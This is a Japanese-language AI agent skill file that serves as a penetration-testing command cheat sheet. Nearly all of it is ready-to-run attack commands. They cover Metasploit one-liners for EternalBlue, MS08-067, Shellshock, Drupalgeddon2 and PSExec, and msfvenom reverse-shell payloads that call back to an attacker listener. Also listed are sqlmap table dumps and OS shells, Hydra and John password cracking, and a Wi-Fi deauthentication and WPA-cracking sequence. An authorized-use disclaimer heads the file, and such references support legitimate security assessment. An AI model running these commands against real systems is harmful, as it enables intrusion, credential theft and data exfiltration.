pentest-commands
ネットワークスキャン、エクスプロイト、パスワードクラッキング、Webアプリケーションテストなど、ペネトレーションテストツールの包括的なコマンドリファレンスを提供します。セキュリティアセスメント中に必要なコマンドを素早く参照できます。
description の原文を見る
Provide a comprehensive command reference for penetration testing tools including network scanning, exploitation, password cracking, and web application testing. Enable quick command lookup during security assessments.
SKILL.md 本文
認可された使用のみ: このスキルは認可されたセキュリティ評価、防御的検証、または管理された教育環境でのみ使用してください。
ペンテストコマンド
目的
ネットワークスキャン、エクスプロイト、パスワードクラッキング、ウェブアプリケーションテストを含むペネトレーションテストツールの包括的なコマンドリファレンスを提供します。セキュリティ評価中に迅速なコマンド検索を可能にします。
入力/前提条件
- Kali Linux またはペネトレーションテスト配布版
- 認可を得たターゲットIPアドレス
- ブルートフォース用のワードリスト
- ターゲットシステムへのネットワークアクセス
- ツール構文の基本的な理解
出力/成果物
- ネットワーク列挙結果
- 特定された脆弱性
- エクスプロイトペイロード
- クラックされた認証情報
- ウェブ脆弱性検出結果
コアワークフロー
1. Nmapコマンド
ホスト探索:
# Pingスイープ
nmap -sP 192.168.1.0/24
# スキャンなしでIPをリスト表示
nmap -sL 192.168.1.0/24
# Pingスキャン (ホスト探索)
nmap -sn 192.168.1.0/24
ポートスキャン:
# TCP SYNスキャン (ステルス)
nmap -sS 192.168.1.1
# 完全TCP接続スキャン
nmap -sT 192.168.1.1
# UDPスキャン
nmap -sU 192.168.1.1
# すべてのポート (1-65535)
nmap -p- 192.168.1.1
# 特定のポート
nmap -p 22,80,443 192.168.1.1
サービス検出:
# サービスバージョン
nmap -sV 192.168.1.1
# OS検出
nmap -O 192.168.1.1
# 包括的なスキャン
nmap -A 192.168.1.1
# ホスト探索をスキップ
nmap -Pn 192.168.1.1
NSEスクリプト:
# 脆弱性スキャン
nmap --script vuln 192.168.1.1
# SMB列挙
nmap --script smb-enum-shares -p 445 192.168.1.1
# HTTP列挙
nmap --script http-enum -p 80 192.168.1.1
# EternalBlueチェック
nmap --script smb-vuln-ms17-010 192.168.1.1
# MS08-067チェック
nmap --script smb-vuln-ms08-067 192.168.1.1
# SSHブルートフォース
nmap --script ssh-brute -p 22 192.168.1.1
# FTP匿名アクセス
nmap --script ftp-anon 192.168.1.1
# DNSブルートフォース
nmap --script dns-brute 192.168.1.1
# HTTPメソッド
nmap -p80 --script http-methods 192.168.1.1
# HTTPヘッダー
nmap -p80 --script http-headers 192.168.1.1
# SQLインジェクションチェック
nmap --script http-sql-injection -p 80 192.168.1.1
高度なスキャン:
# Xmasスキャン
nmap -sX 192.168.1.1
# ACKスキャン (ファイアウォール検出)
nmap -sA 192.168.1.1
# ウィンドウスキャン
nmap -sW 192.168.1.1
# トレースルート
nmap --traceroute 192.168.1.1
2. Metasploitコマンド
基本的な使用方法:
# Metasploitを起動
msfconsole
# エクスプロイトを検索
search type:exploit name:smb
# エクスプロイトを使用
use exploit/windows/smb/ms17_010_eternalblue
# オプションを表示
show options
# ターゲットを設定
set RHOST 192.168.1.1
# ペイロードを設定
set PAYLOAD windows/meterpreter/reverse_tcp
# エクスプロイトを実行
exploit
一般的なエクスプロイト:
# EternalBlue
msfconsole -x "use exploit/windows/smb/ms17_010_eternalblue; set RHOST 192.168.1.1; exploit"
# MS08-067 (Conficker)
msfconsole -x "use exploit/windows/smb/ms08_067_netapi; set RHOST 192.168.1.1; exploit"
# vsftpd バックドア
msfconsole -x "use exploit/unix/ftp/vsftpd_234_backdoor; set RHOST 192.168.1.1; exploit"
# Shellshock
msfconsole -x "use exploit/linux/http/apache_mod_cgi_bash_env_exec; set RHOST 192.168.1.1; exploit"
# Drupalgeddon2
msfconsole -x "use exploit/unix/webapp/drupal_drupalgeddon2; set RHOST 192.168.1.1; exploit"
# PSExec
msfconsole -x "use exploit/windows/smb/psexec; set RHOST 192.168.1.1; set SMBUser user; set SMBPass pass; exploit"
スキャナー:
# TCPポートスキャン
msfconsole -x "use auxiliary/scanner/portscan/tcp; set RHOSTS 192.168.1.0/24; run"
# SMBバージョンスキャン
msfconsole -x "use auxiliary/scanner/smb/smb_version; set RHOSTS 192.168.1.0/24; run"
# SMB共有列挙
msfconsole -x "use auxiliary/scanner/smb/smb_enumshares; set RHOSTS 192.168.1.0/24; run"
# SSHブルートフォース
msfconsole -x "use auxiliary/scanner/ssh/ssh_login; set RHOSTS 192.168.1.0/24; set USER_FILE users.txt; set PASS_FILE passwords.txt; run"
# FTPブルートフォース
msfconsole -x "use auxiliary/scanner/ftp/ftp_login; set RHOSTS 192.168.1.0/24; set USER_FILE users.txt; set PASS_FILE passwords.txt; run"
# RDPスキャン
msfconsole -x "use auxiliary/scanner/rdp/rdp_scanner; set RHOSTS 192.168.1.0/24; run"
ハンドラーセットアップ:
# リバースシェル用マルチハンドラー
msfconsole -x "use exploit/multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST 192.168.1.2; set LPORT 4444; exploit"
ペイロード生成 (msfvenom):
# Windowsリバースシェル
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.2 LPORT=4444 -f exe > shell.exe
# Linuxリバースシェル
msfvenom -p linux/x64/shell_reverse_tcp LHOST=192.168.1.2 LPORT=4444 -f elf > shell.elf
# PHPリバースシェル
msfvenom -p php/reverse_php LHOST=192.168.1.2 LPORT=4444 -f raw > shell.php
# ASPリバースシェル
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.2 LPORT=4444 -f asp > shell.asp
# WARファイル
msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.1.2 LPORT=4444 -f war > shell.war
# Pythonペイロード
msfvenom -p cmd/unix/reverse_python LHOST=192.168.1.2 LPORT=4444 -f raw > shell.py
3. Niktoコマンド
# 基本的なスキャン
nikto -h http://192.168.1.1
# 包括的なスキャン
nikto -h http://192.168.1.1 -C all
# ファイルに出力
nikto -h http://192.168.1.1 -output report.html
# プラグインベースのスキャン
nikto -h http://192.168.1.1 -Plugins robots
nikto -h http://192.168.1.1 -Plugins shellshock
nikto -h http://192.168.1.1 -Plugins heartbleed
nikto -h http://192.168.1.1 -Plugins ssl
# Metasploitにエクスポート
nikto -h http://192.168.1.1 -Format msf+
# 特定のチューニング
nikto -h http://192.168.1.1 -Tuning 1 # 興味深いファイルのみ
4. SQLMapコマンド
# 基本的なインジェクションテスト
sqlmap -u "http://192.168.1.1/page?id=1"
# データベースを列挙
sqlmap -u "http://192.168.1.1/page?id=1" --dbs
# テーブルを列挙
sqlmap -u "http://192.168.1.1/page?id=1" -D database --tables
# テーブルをダンプ
sqlmap -u "http://192.168.1.1/page?id=1" -D database -T users --dump
# OSシェル
sqlmap -u "http://192.168.1.1/page?id=1" --os-shell
# POSTリクエスト
sqlmap -u "http://192.168.1.1/login" --data="user=admin&pass=test"
# Cookie インジェクション
sqlmap -u "http://192.168.1.1/page" --cookie="id=1*"
# WAFバイパス
sqlmap -u "http://192.168.1.1/page?id=1" --tamper=space2comment
# リスクとレベル
sqlmap -u "http://192.168.1.1/page?id=1" --risk=3 --level=5
5. Hydraコマンド
# SSHブルートフォース
hydra -l admin -P /usr/share/wordlists/rockyou.txt ssh://192.168.1.1
# FTPブルートフォース
hydra -l admin -P /usr/share/wordlists/rockyou.txt ftp://192.168.1.1
# HTTPポストフォーム
hydra -l admin -P passwords.txt 192.168.1.1 http-post-form "/login:user=^USER^&pass=^PASS^:Invalid"
# HTTP基本認証
hydra -l admin -P passwords.txt 192.168.1.1 http-get /admin/
# SMBブルートフォース
hydra -l admin -P passwords.txt smb://192.168.1.1
# RDPブルートフォース
hydra -l admin -P passwords.txt rdp://192.168.1.1
# MySQLブルートフォース
hydra -l root -P passwords.txt mysql://192.168.1.1
# ユーザー名リスト
hydra -L users.txt -P passwords.txt ssh://192.168.1.1
6. John the Ripperコマンド
# パスワードファイルをクラック
john hash.txt
# ワードリストを指定
john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt
# クラックされたパスワードを表示
john hash.txt --show
# フォーマットを指定
john hash.txt --format=raw-md5
john hash.txt --format=nt
john hash.txt --format=sha512crypt
# SSHキーパスフレーズ
ssh2john id_rsa > ssh_hash.txt
john ssh_hash.txt --wordlist=/usr/share/wordlists/rockyou.txt
# ZIPパスワード
zip2john file.zip > zip_hash.txt
john zip_hash.txt
7. Aircrack-ngコマンド
# モニターモード
airmon-ng start wlan0
# パケットをキャプチャ
airodump-ng wlan0mon
# 特定のネットワークをターゲット
airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w capture wlan0mon
# デオース攻撃
aireplay-ng -0 10 -a AA:BB:CC:DD:EE:FF wlan0mon
# WPAハンドシェイクをクラック
aircrack-ng -w /usr/share/wordlists/rockyou.txt capture-01.cap
8. Wireshark/Tsharkコマンド
# トラフィックをキャプチャ
tshark -i eth0 -w capture.pcap
# キャプチャファイルを読み込み
tshark -r capture.pcap
# プロトコルでフィルタリング
tshark -r capture.pcap -Y "http"
# IPでフィルタリング
tshark -r capture.pcap -Y "ip.addr == 192.168.1.1"
# HTTPデータを抽出
tshark -r capture.pcap -Y "http" -T fields -e http.request.uri
クイックリファレンス
一般的なポートスキャン
# クイックスキャン
nmap -F 192.168.1.1
# 完全な包括的スキャン
nmap -sV -sC -A -p- 192.168.1.1
# バージョン検出付きの高速スキャン
nmap -sV -T4 192.168.1.1
パスワードハッシュタイプ
| モード | タイプ |
|---|---|
| 0 | MD5 |
| 100 | SHA1 |
| 1000 | NTLM |
| 1800 | sha512crypt |
| 3200 | bcrypt |
| 13100 | Kerberoast |
制約
- 常に書面による認可を取得してください
- 一部のスキャンはノイズが多く、検出可能です
- ブルートフォースはアカウントをロックする可能性があります
- レート制限がツールに影響します
例
例1: クイック脆弱性スキャン
nmap -sV --script vuln 192.168.1.1
例2: ウェブアプリテスト
nikto -h http://target && sqlmap -u "http://target/page?id=1" --dbs
トラブルシューティング
| 問題 | 解決方法 |
|---|---|
| スキャンが遅い | タイミングを増加 (-T4, -T5) |
| ポートがフィルタリングされている | 別のスキャンタイプを試す |
| エクスプロイトが失敗する | ターゲットのバージョン互換性を確認 |
| パスワードがクラックできない | より大きなワードリストやルールを試す |
使用時期
このスキルは、概要で説明されているワークフローまたはアクションを実行するのに適用できます。
ライセンス: MIT(寛容ライセンスのため全文を引用しています) · 原本リポジトリ
詳細情報
- 作者
- sickn33
- ライセンス
- MIT
- 最終更新
- 不明
Source: https://github.com/sickn33/antigravity-awesome-skills / ライセンス: MIT
関連スキル
doubt-driven-development
重要な判断はすべて、本番環境への展開前に新しい視点から対抗的レビューを実施します。速度より正確性が重要な場合、不慣れなコードを扱う場合、本番環境・セキュリティに関わるロジック・取り消し不可の操作など影響度が高い場合、または後でバグを修正するよりも今検証する方が効率的な場合に活用してください。
apprun-skills
TypeScriptを使用したAppRunアプリケーションのMVU設計に関する総合的なガイダンスが得られます。コンポーネントパターン、イベントハンドリング、状態管理(非同期ジェネレータを含む)、パラメータと保護機能を備えたルーティング・ナビゲーション、vistestを使用したテストに対応しています。AppRunコンポーネントの設計・レビュー、ルートの配線、状態フローの管理、AppRunテストの作成時に活用してください。
desloppify
コードベースのヘルスチェックと技術負債の追跡ツールです。コード品質、技術負債、デッドコード、大規模ファイル、ゴッドクラス、重複関数、コードスメル、命名規則の問題、インポートサイクル、結合度の問題についてユーザーが質問した場合に使用してください。また、ヘルススコアの確認、次の改善項目の提案、クリーンアップ計画の作成をリクエストされた際にも対応します。29言語に対応しています。
debugging-and-error-recovery
テストが失敗したり、ビルドが壊れたり、動作が期待と異なったり、予期しないエラーが発生したりした場合に、体系的な根本原因デバッグをガイドします。推測ではなく、根本原因を見つけて修正するための体系的なアプローチが必要な場合に使用してください。
test-driven-development
テスト駆動開発により実装を進めます。ロジックの実装、バグの修正、動作の変更など、あらゆる場面で活用できます。コードが正常に動作することを証明する必要がある場合、バグ報告を受けた場合、既存機能を修正する予定がある場合に使用してください。
incremental-implementation
変更を段階的に実施します。複数のファイルに影響する機能や変更を実装する場合に使用してください。大量のコードを一度に書こうとしている場合や、タスクが一度では完結できないほど大きい場合に活用します。